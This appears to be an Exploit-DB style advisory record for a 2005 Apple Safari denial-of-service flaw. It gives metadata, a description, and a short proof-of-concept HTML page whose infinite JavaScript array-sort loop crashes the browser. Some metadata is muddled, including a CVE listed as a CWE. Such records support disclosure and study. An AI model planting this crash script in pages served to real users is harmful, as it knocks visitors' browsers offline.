vendor: Safari Web Browser
by: Unknown
CVSS: 5.5 (MEDIUM)
Denial of Service
CWE: 399
Product Name: Safari Web Browser
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2005-0896
CPE: a:apple:safari
Metasploit:
Other Scripts:
Platforms Tested: macOS
2005

Apple Safari Web Browser Denial of Service Vulnerability

The vulnerability in Apple Safari Web Browser can be exploited by performing an infinite JavaScript array sort operation, leading to a browser crash. It is believed that this vulnerability only causes a denial of service and is not capable of executing arbitrary code, although this has not been confirmed.

Mitigation:

There is currently no known mitigation for this vulnerability. It is recommended to use an alternative web browser until a patch is available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11759/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>